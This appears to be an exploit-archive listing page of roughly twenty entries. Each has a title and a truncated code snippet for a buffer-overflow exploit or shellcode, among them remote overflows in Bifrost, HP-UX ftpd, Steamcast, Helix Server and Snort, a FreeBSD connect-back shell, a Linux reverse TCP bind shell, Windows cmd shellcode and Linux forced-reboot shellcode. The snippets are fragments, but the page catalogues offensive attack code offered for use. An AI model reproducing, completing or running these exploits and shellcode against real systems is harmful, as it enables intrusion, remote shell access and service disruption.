Bifrost 1.2.1 - Remote Buffer OverFlow

No description provided by source. !/usr/bin/python2.7 By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import sys def rc4cryptdata, key: x = 0 box = range256 for i in range256: x = x + boxi + ordkeyi % lenkey % 256 boxi, boxx = boxx, boxi x =...

win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes

No description provided by source. 68 9D 61 F9 77 push 0x77C01345 B8 C7 93 C1 77 mov eax,msvcrt.system FF D0 call eax In msvcrt.dll at 0x77C01344 We have string .cmd, that's the trick. Code will work in WinXP SP3 Pro Rus, in other versions you'd better search the string and systemchar address for...

BSD x86 connect back Shellcode (81 bytes)

No description provided by source. / -------------- FreeBSD/x86 - connect back /bin/sh. 81 bytes ---------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : [email protected] / include stdio.h include string.h include arpa/inet.h char shellcode =...

HP-UX FTPD Remote Buffer Overflow Exploit

No description provided by source. / theoretical exploit for hpux ftpd vulnerability / / not tested anywhere, needs tweaking / / c 2000 by babcia padlina ltd. [email protected] / include stdio.h include stdlib.h define NOPS 100 define BUFSIZE 1024 char shellcode = / HP-UX shellcode /...

Steamcast - (HTTP Request) Remote Buffer Overflow Exploit (SEH) (2)

No description provided by source. !/usr/bin/python Usage : steamcast.py victimeip Bug : SteamcastHTTP Request Remote Buffer Overflow Exploit SEH 2 Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. Tested on : Xp sp2 fr Exploited by : His0k4 Greetings : All friends &...

Stanley T. Shebs Xconq 7.2.2 - Buffer Overflow Vulnerabilities in xconq

No description provided by source. source: http://www.securityfocus.com/bid/1495/info Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the...

Cain & Abel <= 4.9.24 - .RDP Stack Overflow Exploit

No description provided by source. !/usr/bin/perl Cain & Abel = v4.9.24 .RDP Stack Overflow Exploit Exploit by SkD [email protected] ----------------------------------------------- Nothing much to say about this one. This works on an updated Windows XP SP3. On Vista this exploit is way easier th...

rsync <= 2.5.7 - Local stack overflow Root Exploit

No description provided by source. / rsync = 2.5.7 Local Exploit Saved EIP on stack is overwritten with address of shellcode in memory Generally rsync is not setuid or setgid so just a local shell is of no use So i used a portbinding shellcode as a PoC of a different attack vector. RET is...

RealPlayer 10 ".smil" File Local Buffer Overflow Exploit

No description provided by source. / RealPlayer .smil file buffer overflow Coded by nolimit@CiSO & Buzzdee greets to COREiSO & news & flare & class101 & ESI & RVL & everyone else I forget This uses a seh overwrite method, which takes advantage of the SEH being placed in multiple locations over th...

Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)

No description provided by source. / snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit by Russell Sanford [email protected] - www.code-junkies.net - Date: Nov 11, 2005 Discription: A buffer overflow exist in the snort pre-preprocessor designed to detect encrypted Back Orifice ping...

Yahoo Player 1.0 - (.m3u) Buffer Overflow Exploit

No description provided by source. Title: Yahoo Player v1.0 .m3u Buffer Overflow Exploit direct EIP overwrite Date: 2010-03-07 Author: BombardMr. tro0oqy originally discovered it, and gave a SEH Version:1.0 Tested on: Windows XP SP2 CVE: my $file=crash.m3u; my $junkA=Ax2080; my...

x86 linux hard / unclean reboot (29 bytes)

No description provided by source. / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

x86 linux hard / unclean reboot (33 bytes)

No description provided by source. / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

Helix Server 11.0.1 - Remote Heap Overflow Exploit (win2k SP4)

No description provided by source. /usr/bin/python Remote exploit for the vulnerability in Helix server v11.0.1 as described at http://gleg.net/helix.txt The exploit spawns a shell on TCP port 4444 and connects to it. At the time of overflow we control EAX which is used in a call as follows...

Linux/x86 Reverse TCP Bind Shellcode (92 bytes)

No description provided by source. / Title : reversetcpbindshell 92 bytes Date : 16 May 2013 Author : Russell Willis [email protected] Testd on: Linux/x86 SMP Debian 3.2.41-2 i686 $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf32-i386 Disassembly of section .text:...

Solaris 7.0/8 Xsun Buffer Overrun Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1140/info A buffer overrun vulnerability exists in the Xsun X11 server, as shipped as part of Solaris 7 and 8 from Sun Microsystems. By supplying a long argument to the -dev option normally used to set the output device, ...

GhostScript PostScript File Stack Overflow Exploit

No description provided by source. Check Point Software Technologies - Vulnerability Discovery Team VDT Rodrigo Rubira Branco - rbranco noSPAM checkpoint.com GhostScript Stack Overflow bsd/x86/shellbindtcp - 214 bytes http://www.metasploit.com Encoder: x86/alphaupper AppendExit=false,...

ComponentOne VSFlexGrid 7 & 8 - "Archive()" method Remote Buffer Overflow Exploit

No description provided by source. Tilte: ComponentOne VSFlexGrid v. 7 & 8 Archive method Remote Buffer Overflow Exploit Date....................: 19-05-2010 Author..................: Ma3sTr0-Dz Location ...............: Algeria Software ...............: ComponentOne VSFlexGrid v. 7 & 8...

VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit

No description provided by source. !/usr/bin/ruby ''' Author: Provensec www.provensec.com [email protected] Tested on XP SP3 / Windows 7 Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on...

Jasc Paint Shop Pro 8 - Local Buffer Overflow Exploit (UNIVERSAL)

No description provided by source. / Software: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit UNIVERSAL Bug type: Local buffer overflow Exploitation method: SEH handler overwrite Description: When a crafted .PNG file is oppened a stack buffer overflow occurs because of DEP a SEH handler is...